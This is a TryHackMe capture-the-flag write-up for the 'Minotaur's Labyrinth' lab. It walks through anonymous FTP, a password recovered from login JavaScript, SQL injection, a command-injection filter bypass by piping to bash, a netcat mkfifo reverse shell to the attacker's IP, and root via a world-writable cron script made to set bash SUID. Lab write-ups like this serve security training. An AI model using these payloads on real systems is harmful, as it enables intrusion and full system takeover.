# TryHackMe-Minotaur's Labyrinth
## NMAP
```bash
21/tcp open ftp syn-ack ttl 63 ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 nobody nogroup 4096 Jun 15 14:57 pub
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: C4AF3528B196E5954B638C13DDC75F2F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Login
|_Requested resource was login.html
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: BE43D692E85622C2A4B2B588A8F8E2A6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| NULL:
|_ Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint
```
## PORT 21 (FTP)
Since `anonymous` login is enabled , we can login to ftp without the need of password
We can see a directory named `pub` and in that folder we'll see another hidden folder and a text file
From `.secret` we'll get two more text files
The message that those two files give us is
## PORT 80 (HTTP)
On the webserver we can find a login page
If we check the source , we can fing `login.js`
Looking into the javascript file , we can see there are three arrays , `a`,`b` and `c` and the indexes of these 3 arrays are being combined to generate a password , so we need to just copy that part of the function and just print the concatenated value of string also to note that this is a password for `Daedalus`
```python
a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
print (a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8])
```
After submitting those credentials onto the login page we'll be granted access to the dashboard
If we scroll down a little , we can see that there are two options , either we search for people name from `People` table or we search for creature name from `Creatures` table , so let's run `burp suite` on this page and try some sqli
If we search the name "Daedalus" it will return us this user's id and password
So let's try a sqli `'or 1=1 --`
And this gave us all the reuslts from Person's table, we can also check how many number of columns does this table have so we can also enumerate which version of `mysql` it's using.
If we try to arrange the records by 4th column it's going to give us an error meaning that there are only 3 columns in the table
We can crack the users password from `crackstation` website
On logging in with `M!n0taur` user we can see another tab in navigation bar
## Foothold
On this page we can echo text but if we try to break out of the command to run bash commands we can't as it's using this regex (saw from the hint)
`/[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/`
This regex doesn't include `|` so we can echo `id` and pipe it's reuslt to `bash`
We can check if there's netcat (nc) available on this machine
To get a reverse shell , we need to base64 encode the netcat shell because there will be special characters in the payload so first we'll convert it to base64
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.94.60 2222 >/tmp/f`
And we'll send it by piping it to base64 deocde and then to bash
Stabilizing the shell
We can check the `echo.php` file just to understand what was happening in the background
Also we can find database credentials from `dbconnect.php`
In `user` directory we can get our user flag
## Privilege Escalation (root)
We can find a directory named `timer` in root directory `/`
```bash
#!/bin/bash
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt
```
We know that everyone can read ,write and execute this bash script , so we can try to add `id` and save the result in a file ,and if we wait for the bash script to be executed we'll see the result of this command
Now what we can do is , make bash a `SUID` so when we execute bash it will be executed as root user and we will get shell as root user